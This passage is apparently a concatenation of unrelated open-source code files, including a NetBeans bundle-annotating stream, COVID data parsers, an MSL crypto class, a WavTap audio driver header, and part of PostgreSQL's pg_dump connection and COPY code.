/** state transition diagram constants */ private static final int IN_KEY_BACKSLASH = 3; /** state transition diagram constants */ private static final int AFTER_KEY = 4; /** state transition diagram constants */ private static final int WAITING_FOR_VALUE = 5; /** state transition diagram constants */ private static final int IN_VALUE = 6; /** state transition diagram constants */ private static final int IN_VALUE_BACKSLASH = 7; private final InputStream base; private final int id; private final boolean localizable; /** current line number */ private int line = 0; /** line number in effect for last-encountered key */ private int keyLine = 0; /** current state in state machine */ private int state = WAITING_FOR_KEY; /** if true, the last char was a CR, waiting to see if we get a NL too */ private boolean twixtCrAndNl = false; /** if non-null, a string to serve up before continuing (length must be > 0) */ private String toInsert = null; /** if true, the next value encountered should be localizable if normally it would not be, or vice-versa */ private boolean reverseLocalizable = false; /** text of currently read comment, including leading comment character */ private StringBuffer lastComment = null; /** text of currently read value, ignoring escapes for now */ private final StringBuilder currentValue = new StringBuilder(); /** Create a new InputStream which will annotate resource bundles. * Bundles named Bundle*.properties will be treated as localizable by default, * and so annotated; other bundles will be treated as nonlocalizable and not annotated. * Messages can be individually marked as localizable or not to override this default, * in accordance with some I18N conventions for NetBeans. * @param base the unannotated stream * @param id an identifying number to use in annotations * @param localizable if true, this bundle is expected to be localizable * @see http://www.netbeans.org/i18n/ */ public DebugInputStream(InputStream base, int id, boolean localizable) { this.base = base; this.id = id; this.localizable = localizable; } public @Override int read() throws IOException { if (toInsert != null) { char result = toInsert.charAt(0); if (toInsert.length() > 1) { toInsert = toInsert.substring(1); } else { toInsert = null; } return result; } int next = base.read(); if (next == '\n') { twixtCrAndNl = false; line++; } else if (next == '\r') { if (twixtCrAndNl) { line++; } else { twixtCrAndNl = true; } } else { twixtCrAndNl = false; } switch (state) { case WAITING_FOR_KEY: switch (next) { case '#': case '!': state = IN_COMMENT; lastComment = new StringBuffer(); lastComment.append((char) next); return next; case ' ': case '\t': case '\n': case '\r': case -1: return next; case '\\': state = IN_KEY_BACKSLASH; return next; default: state = IN_KEY; keyLine = line + 1; return next; } case IN_COMMENT: switch (next) { case '\n': case '\r': String comment = lastComment.toString(); lastComment = null; if (localizable && comment.equals("#NOI18N")) { // NOI18N reverseLocalizable = true; } else if (localizable && comment.equals("#PARTNOI18N")) { // NOI18N System.err.println( "NbBundle WARNING (" + id + ":" + line + "): #PARTNOI18N encountered, will not annotate I18N parts" ); // NOI18N reverseLocalizable = true; } else if (!localizable && comment.equals("#I18N")) { // NOI18N reverseLocalizable = true; } else if (!localizable && comment.equals("#PARTI18N")) { // NOI18N System.err.println( "NbBundle WARNING (" + id + ":" + line + "): #PARTI18N encountered, will not annotate I18N parts" ); // NOI18N reverseLocalizable = false; } else if ( (localizable && (comment.equals("#I18N") || comment.equals("#PARTI18N"))) || // NOI18N (!localizable && (comment.equals("#NOI18N") || comment.equals("#PARTNOI18N"))) ) { // NOI18N System.err.println( "NbBundle WARNING (" + id + ":" + line + "): incongruous comment " + comment + " found for bundle" ); // NOI18N reverseLocalizable = false; } state = WAITING_FOR_KEY; return next; default: lastComment.append((char) next); return next; } case IN_KEY: switch (next) { case '\\': state = IN_KEY_BACKSLASH; return next; case ' ': case '\t': state = AFTER_KEY; return next; case '=': case ':': state = WAITING_FOR_VALUE; return next; case '\r': case '\n': state = WAITING_FOR_KEY; return next; default: return next; } case IN_KEY_BACKSLASH: state = IN_KEY; return next; case AFTER_KEY: switch (next) { case '=': case ':': state = WAITING_FOR_VALUE; return next; case '\r': case '\n': state = WAITING_FOR_KEY; return next; default: return next; } case WAITING_FOR_VALUE: switch (next) { case '\r': case '\n': state = WAITING_FOR_KEY; return next; case ' ': case '\t': return next; case '\\': state = IN_VALUE_BACKSLASH; return next; default: state = IN_VALUE; currentValue.setLength(0); return next; } case IN_VALUE: switch (next) { case '\\': // Gloss over distinction between simple escapes and \u1234, which is not important for us. // Also no need to deal specially with continuation lines; for us, there is an escaped // newline, after which will be more value, and that is all that is important. state = IN_VALUE_BACKSLASH; return next; case '\n': case '\r': case -1: // End of value. This is the tricky part. boolean revLoc = reverseLocalizable; reverseLocalizable = false; state = WAITING_FOR_KEY; if (localizable ^ revLoc) { // This value is intended to be localizable. Annotate it. assert keyLine > 0; toInsert = "(" + id + ":" + keyLine + ")"; // NOI18N if (next != -1) { toInsert += Character.valueOf((char) next); } keyLine = 0; // Now return the space before the rest of the string explicitly. return ' '; } else { // This is not supposed to be a localizable value, leave it alone. return next; } default: currentValue.append((char) next); return next; } case IN_VALUE_BACKSLASH: state = IN_VALUE; return next; default: throw new IOException("should never happen"); // NOI18N } } } } /** * Local charset to decode using UTF-8 by default, but automatically switching to ISO-8859-1 if UTF-8 decoding fails. * */ private static class UtfThenIsoCharset extends Charset { private final boolean onlyUTF8; /** * * @param acceptOnlyUTF8 If true there is no automatic switch to ISO-8859-1 if UTF-8 decoding fails. */ public UtfThenIsoCharset(boolean acceptOnlyUTF8) { super(UtfThenIsoCharset.class.getCanonicalName(), null); this.onlyUTF8 = acceptOnlyUTF8; } @Override public boolean contains(Charset arg0) { return this.equals(arg0); } @Override public CharsetDecoder newDecoder() { return new UtfThenIsoDecoder(this, 1.0f, 1.0f); } @Override public CharsetEncoder newEncoder() { throw new UnsupportedOperationException("Not supported yet."); } private final class UtfThenIsoDecoder extends CharsetDecoder { private CharsetDecoder decoderUTF; private CharsetDecoder decoderISO; // Not null means we switched to ISO protected UtfThenIsoDecoder(Charset cs, float averageCharsPerByte, float maxCharsPerByte) { super(cs, averageCharsPerByte, maxCharsPerByte); decoderUTF = StandardCharsets.UTF_8.newDecoder() .onMalformedInput(CodingErrorAction.REPORT) // We want to be informed of this error .onUnmappableCharacter(CodingErrorAction.REPORT); // We want to be informed of this error } @Override protected CoderResult decodeLoop(ByteBuffer in, CharBuffer out) { if (decoderISO != null) { // No turning back once we've switched to ISO return decoderISO.decode(in, out, false); } // To rewind if need to retry with ISO decoding in.mark(); out.mark(); // UTF decoding CoderResult cr = decoderUTF.decode(in, out, false); if (cr.isUnderflow() || cr.isOverflow()) { // Normal results return cr; } // If we're here there was a malformed-input or unmappable-character error with the UTF decoding if (UtfThenIsoCharset.this.onlyUTF8) { // But can't switch to ISO return cr; } // Switch to ISO in.reset(); out.reset(); decoderISO = StandardCharsets.ISO_8859_1.newDecoder(); return decoderISO.decode(in, out, false); } } } }
26,437
307
<reponame>trgswe/fs2open.github.com #pragma once #include "scripting/ade_api.h" #include "model/model.h" namespace scripting { namespace api { class mc_info_h { protected: mc_info info; bool valid = false; public: explicit mc_info_h(const mc_info& val); mc_info_h(); mc_info *Get(); bool IsValid(); }; DECLARE_ADE_OBJ(l_ColInfo, mc_info_h); } }
156
430
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import Dict from pandas import DataFrame from lib.cast import safe_float_cast from lib.io import read_file from lib.data_source import DataSource from lib.utils import pivot_table, table_rename from uk_covid19 import Cov19API class ScotlandDataSource(DataSource): @staticmethod def _parse(file_path: str, sheet_name: str, value_name: str): data = read_file(file_path, sheet_name=sheet_name) data.columns = [col.replace("NHS ", "").replace( " total", "") for col in data.iloc[1]] # Drop Golden Jubilee National Hospital - it has no hospitalizations and does not fit # any current matches in metadata.csv. data = data.drop(columns=["Golden Jubilee National Hospital"]) data = data.iloc[2:].rename(columns={"Date": "date"}) data = pivot_table(data.set_index("date"), pivot_name="match_string") data = data.rename(columns={"value": value_name}) data[value_name] = data[value_name].replace( "*", None).apply(safe_float_cast).astype(float) # Get date in ISO format data.date = data.date.apply(lambda x: x.date().isoformat()) # Add metadata data["key"] = None data["country_code"] = "GB" data["subregion1_code"] = "SCT" l2_mask = data.match_string == "Scotland" data.loc[l2_mask, "key"] = "GB_SCT" return data def parse(self, sources: Dict[str, str], aux: Dict[str, DataFrame], **parse_opts) -> DataFrame: hospitalized = ScotlandDataSource._parse( sources[0], sheet_name="Table 3a - Hospital Confirmed", value_name="new_hospitalized" ) intensive_care = ScotlandDataSource._parse( sources[0], sheet_name="Table 2a - ICU patients", value_name="new_intensive_care" ) return hospitalized.merge(intensive_care, how="outer") class UKL1DataSource(DataSource): def parse_dataframes( self, dataframes: Dict[str, DataFrame], aux: Dict[str, DataFrame], **parse_opts ) -> DataFrame: # Specify filter for overview / consolidated data # for the UK api_filter_overview = ["areaType=overview"] # Specify relevant metrics that will be used # according to Google's schema api_structure_hospitalization = { "date": "date", "newAdmissions": "newAdmissions", "cumAdmissions": "cumAdmissions", "hospitalCases": "hospitalCases", "covidOccupiedMVBeds": "covidOccupiedMVBeds", } api = Cov19API(filters=api_filter_overview, structure=api_structure_hospitalization) data = api.get_dataframe() # Rename columns and map to expected schema data = table_rename( data, { "date": "date", "newAdmissions": "new_hospitalized", "cumAdmissions": "total_hospitalized", "hospitalCases": "current_hospitalized", "covidOccupiedMVBeds": "current_ventilator", }, drop=True, ) # Add key data["key"] = "GB" return data class UKL2DataSource(DataSource): def parse_dataframes( self, dataframes: Dict[str, DataFrame], aux: Dict[str, DataFrame], **parse_opts ) -> DataFrame: # Specify filter for UK data at the nation granularity api_filter_overview = ["areaType=nation"] # Specify relevant metrics that will be used # according to Google's schema api_structure_hospitalization = { "areaName": "areaName", "date": "date", "newAdmissions": "newAdmissions", "cumAdmissions": "cumAdmissions", "hospitalCases": "hospitalCases", "covidOccupiedMVBeds": "covidOccupiedMVBeds", } api = Cov19API(filters=api_filter_overview, structure=api_structure_hospitalization) data = api.get_dataframe() # Add keys for all 4 nations data.loc[data["areaName"] == "England", "key"] = "GB_ENG" data.loc[data["areaName"] == "Northern Ireland", "key"] = "GB_NIR" data.loc[data["areaName"] == "Scotland", "key"] = "GB_SCT" data.loc[data["areaName"] == "Wales", "key"] = "GB_WLS" # Rename columns and map to expected schema data = table_rename( data, { "date": "date", "key": "key", "newAdmissions": "new_hospitalized", "cumAdmissions": "total_hospitalized", "hospitalCases": "current_hospitalized", "covidOccupiedMVBeds": "current_ventilator", }, drop=True, ) return data
2,314
1,531
package org.ngrinder.http.cookie; import org.apache.hc.client5.http.impl.cookie.BasicClientCookie; import java.time.Instant; import java.util.Date; import static java.time.temporal.ChronoUnit.SECONDS; public class Cookie { private final BasicClientCookie realCookie; public Cookie(String name, String value) { realCookie = new BasicClientCookie(name, value); } public Cookie(String name, String value, String domain, String path, int expire) { realCookie = new BasicClientCookie(name, value); realCookie.setDomain(domain); realCookie.setPath(path); if (expire >= 0) { realCookie.setExpiryDate(Date.from(Instant.now().plus(expire, SECONDS))); } } public static Cookie from(org.apache.hc.client5.http.cookie.Cookie realCookie) { Cookie cookie = new Cookie(realCookie.getName(), realCookie.getValue()); cookie.realCookie.setDomain(realCookie.getDomain()); cookie.realCookie.setPath(realCookie.getPath()); cookie.realCookie.setExpiryDate(realCookie.getExpiryDate()); return cookie; } BasicClientCookie getRealCookie() { return realCookie; } @Override public String toString() { return "Cookie(" + "name: " + realCookie.getName() + ", value: " + realCookie.getValue() + ", domain: " + realCookie.getDomain() + ", path: " + realCookie.getPath() + ", expire: " + realCookie.getExpiryDate() + ")"; } }
499
32,544
<gh_stars>1000+ package com.baeldung.jpa.removal; import org.junit.Assert; import org.junit.Before; import org.junit.Test; import javax.persistence.EntityManager; import javax.persistence.EntityManagerFactory; import javax.persistence.Persistence; import javax.persistence.PersistenceException; import javax.persistence.TypedQuery; import javax.persistence.criteria.CriteriaBuilder; import javax.persistence.criteria.CriteriaQuery; import javax.persistence.criteria.Root; import java.util.ArrayList; import java.util.List; public class OrphanRemovalIntegrationTest { private static EntityManagerFactory factory; private static EntityManager entityManager; @Before public void setup() { factory = Persistence.createEntityManagerFactory("jpa-h2-removal"); entityManager = factory.createEntityManager(); } @Test public void whenLineItemIsRemovedFromOrderRequest_thenDeleteOrphanedLineItem() { createOrderRequestWithLineItems(); OrderRequest orderRequest = entityManager.find(OrderRequest.class, 1L); LineItem lineItem = entityManager.find(LineItem.class, 2L); orderRequest.removeLineItem(lineItem); entityManager.getTransaction().begin(); entityManager.merge(orderRequest); entityManager.getTransaction().commit(); Assert.assertEquals(1, findAllOrderRequest().size()); Assert.assertEquals(2, findAllLineItem().size()); } @Test(expected = PersistenceException.class) public void whenLineItemsIsReassigned_thenThrowAnException() { createOrderRequestWithLineItems(); OrderRequest orderRequest = entityManager.find(OrderRequest.class, 1L); orderRequest.setLineItems(new ArrayList<>()); entityManager.getTransaction().begin(); entityManager.merge(orderRequest); entityManager.getTransaction().commit(); } private void createOrderRequestWithLineItems() { List<LineItem> lineItems = new ArrayList<>(); lineItems.add(new LineItem("line item 1")); lineItems.add(new LineItem("line item 2")); lineItems.add(new LineItem("line item 3")); OrderRequest orderRequest = new OrderRequest(lineItems); entityManager.getTransaction().begin(); entityManager.persist(orderRequest); entityManager.getTransaction().commit(); Assert.assertEquals(1, findAllOrderRequest().size()); Assert.assertEquals(3, findAllLineItem().size()); } private List<OrderRequest> findAllOrderRequest() { CriteriaBuilder cb = entityManager.getCriteriaBuilder(); CriteriaQuery<OrderRequest> cq = cb.createQuery(OrderRequest.class); Root<OrderRequest> root = cq.from(OrderRequest.class); CriteriaQuery<OrderRequest> findAll = cq.select(root); TypedQuery<OrderRequest> findAllQuery = entityManager.createQuery(findAll); return findAllQuery.getResultList(); } private List<LineItem> findAllLineItem() { CriteriaBuilder cb = entityManager.getCriteriaBuilder(); CriteriaQuery<LineItem> cq = cb.createQuery(LineItem.class); Root<LineItem> root = cq.from(LineItem.class); CriteriaQuery<LineItem> findAll = cq.select(root); TypedQuery<LineItem> findAllQuery = entityManager.createQuery(findAll); return findAllQuery.getResultList(); } }
1,205
5,169
{ "name": "ZCAlertFrame", "version": "0.0.2", "summary": "自定义Alert弹框", "homepage": "https://github.com/xiaowu2016/ZCAlertFrame", "license": { "type": "MIT", "file": "FILE_LICENSE" }, "authors": { "zhangchao": "<EMAIL>" }, "platforms": { "ios": null }, "source": { "git": "https://github.com/xiaowu2016/ZCAlertFrame.git", "tag": "0.0.2" }, "source_files": [ "Classes", "ZCAlertFrame/ZCAlertFrame/Controller/**/*.{h,m}" ], "requires_arc": true }
244
999
package marquez.client.models; import com.fasterxml.jackson.core.type.TypeReference; import com.google.common.collect.ImmutableMap; import java.net.URL; import java.time.Instant; import java.util.List; import java.util.Optional; import java.util.UUID; import javax.annotation.Nullable; import lombok.EqualsAndHashCode; import lombok.Getter; import lombok.NonNull; import lombok.ToString; import marquez.client.Utils; @EqualsAndHashCode @ToString public final class JobVersion { @Getter private final JobVersionId id; @Getter private final String name; @Getter private final Instant createdAt; @Getter private final UUID version; @Getter private final String namespace; @Nullable private final URL location; @Getter private final ImmutableMap<String, String> context; @Getter private final List<DatasetId> inputs; @Getter private final List<DatasetId> outputs; @Getter @Nullable private final Run latestRun; public JobVersion( @NonNull final JobVersionId id, @NonNull final String name, @NonNull final Instant createdAt, @NonNull final UUID version, @Nullable final URL location, @Nullable final ImmutableMap<String, String> context, List<DatasetId> inputs, List<DatasetId> outputs, @Nullable Run latestRun) { this.id = id; this.name = name; this.createdAt = createdAt; this.version = version; this.namespace = id.getNamespace(); this.location = location; this.context = (context == null) ? ImmutableMap.of() : context; this.inputs = inputs; this.outputs = outputs; this.latestRun = latestRun; } public Optional<URL> getLocation() { return Optional.ofNullable(location); } public static JobVersion fromJson(@NonNull final String json) { return Utils.fromJson(json, new TypeReference<JobVersion>() {}); } }
630
559
/** * Copyright (c) 2012-2014 Netflix, Inc. All rights reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.netflix.msl.crypto; import javax.crypto.SecretKey; import com.netflix.msl.MslError; import com.netflix.msl.MslMasterTokenException; import com.netflix.msl.tokens.MasterToken; import com.netflix.msl.util.MslContext; /** * This is a convenience class for constructing a symmetric crypto context from * a MSL session master token. * * @author <NAME> <<EMAIL>> */ public class SessionCryptoContext extends SymmetricCryptoContext { /** * <p>Construct a new session crypto context from the provided master * token.</p> * * @param ctx MSL context. * @param masterToken the master token. * @throws MslMasterTokenException if the master token is not trusted. */ public SessionCryptoContext(final MslContext ctx, final MasterToken masterToken) throws MslMasterTokenException { this(ctx, masterToken, masterToken.getIdentity(), masterToken.getEncryptionKey(), masterToken.getSignatureKey()); if (!masterToken.isDecrypted()) throw new MslMasterTokenException(MslError.MASTERTOKEN_UNTRUSTED, masterToken); } /** * <p>Construct a new session crypto context from the provided master token. * The entity identity and keys are assumed to be the same as what is * inside the master token, which may be untrusted.</p> * * @param ctx MSL context. * @param masterToken master token. May be untrusted. * @param identity entity identity. May be {@code null}. * @param encryptionKey encryption key. * @param hmacKey HMAC key. */ public SessionCryptoContext(final MslContext ctx, final MasterToken masterToken, final String identity, final SecretKey encryptionKey, final SecretKey hmacKey) { super(ctx, (identity != null) ? identity + "_" + masterToken.getSequenceNumber() : Long.toString(masterToken.getSequenceNumber()), encryptionKey, hmacKey, null); } }
799
502
<reponame>frewsxcv/WavTap #ifndef _SAMPLEAUDIODEVICE_HPP #define _SAMPLEAUDIODEVICE_HPP #include <IOKit/audio/IOAudioDevice.h> #define AUDIO_ENGINE_KEY "AudioEngine" #define DESCRIPTION_KEY "Description" #define BLOCK_SIZE_KEY "BlockSize" #define NUM_BLOCKS_KEY "NumBlocks" #define NUM_STREAMS_KEY "NumStreams" #define FORMATS_KEY "Formats" #define SAMPLE_RATES_KEY "SampleRates" #define SEPARATE_STREAM_BUFFERS_KEY "SeparateStreamBuffers" #define SEPARATE_INPUT_BUFFERS_KEY "SeparateInputBuffers" #define WavTapDevice com_wavtap_driver_WavTapDevice class WavTapEngine; class WavTapDevice : public IOAudioDevice { OSDeclareDefaultStructors(WavTapDevice); friend class WavTapEngine; static const SInt32 kVolumeMax; static const SInt32 kGainMax; SInt32 mVolume[NUM_CHANS+1]; SInt32 mMuteOut[NUM_CHANS+1]; SInt32 mMuteIn[NUM_CHANS+1]; SInt32 mGain[NUM_CHANS+1]; virtual bool initHardware(IOService *provider); virtual bool createAudioEngines(); virtual bool initControls(WavTapEngine *audioEngine); static IOReturn volumeChangeHandler(IOService *target, IOAudioControl *volumeControl, SInt32 oldValue, SInt32 newValue); virtual IOReturn volumeChanged(IOAudioControl *volumeControl, SInt32 oldValue, SInt32 newValue); static IOReturn outputMuteChangeHandler(IOService *target, IOAudioControl *muteControl, SInt32 oldValue, SInt32 newValue); virtual IOReturn outputMuteChanged(IOAudioControl *muteControl, SInt32 oldValue, SInt32 newValue); static IOReturn gainChangeHandler(IOService *target, IOAudioControl *gainControl, SInt32 oldValue, SInt32 newValue); virtual IOReturn gainChanged(IOAudioControl *gainControl, SInt32 oldValue, SInt32 newValue); static IOReturn inputMuteChangeHandler(IOService *target, IOAudioControl *muteControl, SInt32 oldValue, SInt32 newValue); virtual IOReturn inputMuteChanged(IOAudioControl *muteControl, SInt32 oldValue, SInt32 newValue); }; #endif
666
450
/*------------------------------------------------------------------------- * * pg_backup_db.c * * Implements the basic DB functions used by the archiver. * * IDENTIFICATION * $PostgreSQL: pgsql/src/bin/pg_dump/pg_backup_db.c,v 1.75 2006/10/04 00:30:05 momjian Exp $ * *------------------------------------------------------------------------- */ #include "pg_backup_db.h" #include "dumputils.h" #include <unistd.h> #include <ctype.h> #ifdef HAVE_TERMIOS_H #include <termios.h> #endif static const char *modulename = gettext_noop("archiver (db)"); static void _check_database_version(ArchiveHandle *AH); static PGconn *_connectDB(ArchiveHandle *AH, const char *newdbname, const char *newUser); static void notice_processor(void *arg __attribute__((unused)), const char *message); static char *_sendSQLLine(ArchiveHandle *AH, char *qry, char *eos); static char *_sendCopyLine(ArchiveHandle *AH, char *qry, char *eos); static bool _isIdentChar(unsigned char c); static bool _isDQChar(unsigned char c, bool atStart); #define DB_MAX_ERR_STMT 128 static int _parse_version(ArchiveHandle *AH, const char *versionString) { int v; v = parse_version(versionString); if (v < 0) die_horribly(AH, modulename, "could not parse version string \"%s\"\n", versionString); return v; } static void _check_database_version(ArchiveHandle *AH) { int myversion; const char *remoteversion_str; int remoteversion; myversion = _parse_version(AH, PG_VERSION); remoteversion_str = PQparameterStatus(AH->connection, "server_version"); if (!remoteversion_str) die_horribly(AH, modulename, "could not get server_version from libpq\n"); remoteversion = _parse_version(AH, remoteversion_str); AH->public.remoteVersionStr = strdup(remoteversion_str); AH->public.remoteVersion = remoteversion; if (!AH->archiveRemoteVersion) AH->archiveRemoteVersion = AH->public.remoteVersionStr; if (myversion != remoteversion && (remoteversion < AH->public.minRemoteVersion || remoteversion > AH->public.maxRemoteVersion)) { write_msg(NULL, "server version: %s; %s version: %s\n", remoteversion_str, progname, PG_VERSION); die_horribly(AH, NULL, "aborting because of server version mismatch\n"); } } /* * Reconnect to the server. If dbname is not NULL, use that database, * else the one associated with the archive handle. If username is * not NULL, use that user name, else the one from the handle. If * both the database and the user match the existing connection already, * nothing will be done. * * Returns 1 in any case. */ int ReconnectToServer(ArchiveHandle *AH, const char *dbname, const char *username) { PGconn *newConn; const char *newdbname; const char *newusername; if (!dbname) newdbname = PQdb(AH->connection); else newdbname = dbname; if (!username) newusername = PQuser(AH->connection); else newusername = username; /* Let's see if the request is already satisfied */ if (strcmp(newdbname, PQdb(AH->connection)) == 0 && strcmp(newusername, PQuser(AH->connection)) == 0) return 1; newConn = _connectDB(AH, newdbname, newusername); PQfinish(AH->connection); AH->connection = newConn; return 1; } /* * Connect to the db again. * * Note: it's not really all that sensible to use a single-entry password * cache if the username keeps changing. In current usage, however, the * username never does change, so one savedPassword is sufficient. We do * update the cache on the off chance that the password has changed since the * start of the run. */ static PGconn * _connectDB(ArchiveHandle *AH, const char *reqdb, const char *requser) { PGconn *newConn; const char *newdb; const char *newuser; char *password = AH->savedPassword; bool new_pass; if (!reqdb) newdb = PQdb(AH->connection); else newdb = reqdb; if (!requser || strlen(requser) == 0) newuser = PQuser(AH->connection); else newuser = requser; ahlog(AH, 1, "connecting to database \"%s\" as user \"%s\"\n", newdb, newuser); if (AH->promptPassword == TRI_YES && password == NULL) { password = simple_prompt("Password: ", 100, false); if (password == NULL) die_horribly(AH, modulename, "out of memory\n"); } do { #define PARAMS_ARRAY_SIZE 7 const char **keywords = malloc(PARAMS_ARRAY_SIZE * sizeof(*keywords)); const char **values = malloc(PARAMS_ARRAY_SIZE * sizeof(*values)); if (!keywords || !values) die_horribly(AH, modulename, "out of memory\n"); keywords[0] = "host"; values[0] = PQhost(AH->connection); keywords[1] = "port"; values[1] = PQport(AH->connection); keywords[2] = "user"; values[2] = newuser; keywords[3] = "password"; values[3] = password; keywords[4] = "dbname"; values[4] = newdb; keywords[5] = "fallback_application_name"; values[5] = progname; keywords[6] = NULL; values[6] = NULL; new_pass = false; newConn = PQconnectdbParams(keywords, values, true); free(keywords); free(values); if (!newConn) die_horribly(AH, modulename, "failed to reconnect to database\n"); if (PQstatus(newConn) == CONNECTION_BAD) { if (!PQconnectionNeedsPassword(newConn)) die_horribly(AH, modulename, "could not reconnect to database: %s", PQerrorMessage(newConn)); PQfinish(newConn); if (password) fprintf(stderr, "Password incorrect\n"); fprintf(stderr, "Connecting to %s as %s\n", newdb, newuser); if (password) free(password); if (AH->promptPassword != TRI_NO) password = simple_prompt("Password: ", 100, false); else die_horribly(AH, modulename, "connection needs password\n"); if (password == NULL) die_horribly(AH, modulename, "out of memory\n"); new_pass = true; } } while (new_pass); AH->savedPassword = password; /* check for version mismatch */ _check_database_version(AH); PQsetNoticeProcessor(newConn, notice_processor, NULL); return newConn; } /* * Make a database connection with the given parameters. The * connection handle is returned, the parameters are stored in AHX. * An interactive password prompt is automatically issued if required. * * Note: it's not really all that sensible to use a single-entry password * cache if the username keeps changing. In current usage, however, the * username never does change, so one savedPassword is sufficient. */ PGconn * ConnectDatabase(Archive *AHX, const char *dbname, const char *pghost, const char *pgport, const char *username, enum trivalue prompt_password) { ArchiveHandle *AH = (ArchiveHandle *) AHX; char *password = AH->savedPassword; bool new_pass; if (AH->connection) die_horribly(AH, modulename, "already connected to a database\n"); if (prompt_password == TRI_YES && password == NULL) { password = simple_prompt("Password: ", 100, false); if (password == NULL) die_horribly(AH, modulename, "out of memory\n"); } AH->promptPassword = <PASSWORD>; /* * Start the connection. Loop until we have a password if requested by * backend. */ do { #define PARAMS_ARRAY_SIZE 7 const char **keywords = malloc(PARAMS_ARRAY_SIZE * sizeof(*keywords)); const char **values = malloc(PARAMS_ARRAY_SIZE * sizeof(*values)); if (!keywords || !values) die_horribly(AH, modulename, "out of memory\n"); keywords[0] = "host"; values[0] = pghost; keywords[1] = "port"; values[1] = pgport; keywords[2] = "user"; values[2] = username; keywords[3] = "password"; values[3] = password; keywords[4] = "dbname"; values[4] = dbname; keywords[5] = "fallback_application_name"; values[5] = progname; keywords[6] = NULL; values[6] = NULL; new_pass = false; AH->connection = PQconnectdbParams(keywords, values, true); free(keywords); free(values); if (!AH->connection) die_horribly(AH, modulename, "failed to connect to database\n"); if (PQstatus(AH->connection) == CONNECTION_BAD && PQconnectionNeedsPassword(AH->connection) && password == NULL && prompt_password != TRI_NO) { PQfinish(AH->connection); password = simple_prompt("Password: ", 100, false); if (password == NULL) die_horribly(AH, modulename, "out of memory\n"); new_pass = true; } } while (new_pass); AH->savedPassword = password; /* check to see that the backend connection was successfully made */ if (PQstatus(AH->connection) == CONNECTION_BAD) die_horribly(AH, modulename, "connection to database \"%s\" failed: %s", PQdb(AH->connection), PQerrorMessage(AH->connection)); /* check for version mismatch */ _check_database_version(AH); PQsetNoticeProcessor(AH->connection, notice_processor, NULL); return AH->connection; } static void notice_processor(void *arg __attribute__((unused)), const char *message) { write_msg(NULL, "%s", message); } /* Public interface */ /* Convenience function to send a query. Monitors result to handle COPY statements */ static void ExecuteSqlCommand(ArchiveHandle *AH, const char *qry, const char *desc) { PGconn *conn = AH->connection; PGresult *res; char errStmt[DB_MAX_ERR_STMT]; #ifdef NOT_USED fprintf(stderr, "Executing: '%s'\n\n", qry); #endif res = PQexec(conn, qry); switch (PQresultStatus(res)) { case PGRES_COMMAND_OK: case PGRES_TUPLES_OK: /* A-OK */ break; case PGRES_COPY_IN: /* Assume this is an expected result */ AH->pgCopyIn = true; break; default: /* trouble */ strncpy(errStmt, qry, DB_MAX_ERR_STMT); if (errStmt[DB_MAX_ERR_STMT - 1] != '\0') { errStmt[DB_MAX_ERR_STMT - 4] = '.'; errStmt[DB_MAX_ERR_STMT - 3] = '.'; errStmt[DB_MAX_ERR_STMT - 2] = '.'; errStmt[DB_MAX_ERR_STMT - 1] = '\0'; } warn_or_die_horribly(AH, modulename, "%s: %s Command was: %s\n", desc, PQerrorMessage(conn), errStmt); break; } PQclear(res); } /* * Used by ExecuteSqlCommandBuf to send one buffered line when running a COPY command. */ static char * _sendCopyLine(ArchiveHandle *AH, char *qry, char *eos) { size_t loc; /* Location of next newline */ int pos = 0; /* Current position */ int sPos = 0; /* Last pos of a slash char */ int isEnd = 0; /* loop to find unquoted newline ending the line of COPY data */ for (;;) { loc = strcspn(&qry[pos], "\n") + pos; /* If no match, then wait */ if (loc >= (eos - qry)) /* None found */ { appendBinaryPQExpBuffer(AH->pgCopyBuf, qry, (eos - qry)); return eos; } /* * fprintf(stderr, "Found cr at %d, prev char was %c, next was %c\n", * loc, qry[loc-1], qry[loc+1]); */ /* Count the number of preceding slashes */ sPos = loc; while (sPos > 0 && qry[sPos - 1] == '\\') sPos--; sPos = loc - sPos; /* * If an odd number of preceding slashes, then \n was escaped so set * the next search pos, and loop (if any left). */ if ((sPos & 1) == 1) { /* fprintf(stderr, "cr was escaped\n"); */ pos = loc + 1; if (pos >= (eos - qry)) { appendBinaryPQExpBuffer(AH->pgCopyBuf, qry, (eos - qry)); return eos; } } else break; } /* We found an unquoted newline */ qry[loc] = '\0'; appendPQExpBuffer(AH->pgCopyBuf, "%s\n", qry); isEnd = (strcmp(AH->pgCopyBuf->data, "\\.\n") == 0); /* * Note that we drop the data on the floor if libpq has failed to enter * COPY mode; this allows us to behave reasonably when trying to continue * after an error in a COPY command. */ if (AH->pgCopyIn && PQputCopyData(AH->connection, AH->pgCopyBuf->data, AH->pgCopyBuf->len) <= 0) die_horribly(AH, modulename, "error returned by PQputCopyData: %s", PQerrorMessage(AH->connection)); resetPQExpBuffer(AH->pgCopyBuf); if (isEnd && AH->pgCopyIn) { PGresult *res; if (PQputCopyEnd(AH->connection, NULL) <= 0) die_horribly(AH, modulename, "error returned by PQputCopyEnd: %s", PQerrorMessage(AH->connection)); /* Check command status and return to normal libpq state */ res = PQgetResult(AH->connection); if (PQresultStatus(res) != PGRES_COMMAND_OK) warn_or_die_horribly(AH, modulename, "COPY failed: %s", PQerrorMessage(AH->connection)); PQclear(res); AH->pgCopyIn = false; } return qry + loc + 1; } /* * Used by ExecuteSqlCommandBuf to send one buffered line of SQL * (not data for the copy command). */ static char * _sendSQLLine(ArchiveHandle *AH, char *qry, char *eos) { /* * The following is a mini state machine to assess the end of an SQL * statement. It really only needs to parse good SQL, or at least that's * the theory... End-of-statement is assumed to be an unquoted, * un-commented semi-colon that's not within any parentheses. * * Note: the input can be split into bufferloads at arbitrary boundaries. * Therefore all state must be kept in AH->sqlparse, not in local * variables of this routine. We assume that AH->sqlparse was filled with * zeroes when created. */ for (; qry < eos; qry++) { switch 